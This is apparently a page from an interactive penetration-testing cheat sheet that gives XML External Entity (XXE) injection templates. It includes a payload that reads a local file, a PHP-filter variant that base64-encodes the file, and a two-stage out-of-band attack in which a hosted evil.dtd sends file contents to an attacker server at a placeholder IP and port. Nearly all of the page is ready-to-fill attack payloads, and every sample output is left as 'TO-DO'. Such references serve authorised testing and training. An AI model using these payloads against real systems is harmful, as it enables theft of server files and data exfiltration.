Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
XXE Template
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY data SYSTEM "<FILE>">]>
<<TAG>>
<<TAG1>>&data;</<TAG1>>
</<TAG>>
Sample Output:
TO-DO
XXE Template (With PHP Filter)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY data SYSTEM "php://filter/convert.base64-encode/resource=<FILE>">]>
<<TAG>>
<<TAG1>>&data;</<TAG1>>
</<TAG>>
Sample Output:
TO-DO
External DTD (2 Stage)
1. Create a evil.dtd
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=<FILE>">
<!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://<LOCAL_IP>:<PORT>/data?%data;'>">
Sample Output:
TO-DO
2. Host a Server
python3 -m http.server <PORT>
Sample Output:
TO-DO
2. XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % bar SYSTEM "http://<LOCAL_IP>:<PORT>/evil.dtd">
%bar;
%eval;
]>
<<TAG>>
<<TAG1>>&exfil;</<TAG1>>
</<TAG>>
Sample Output:
TO-DO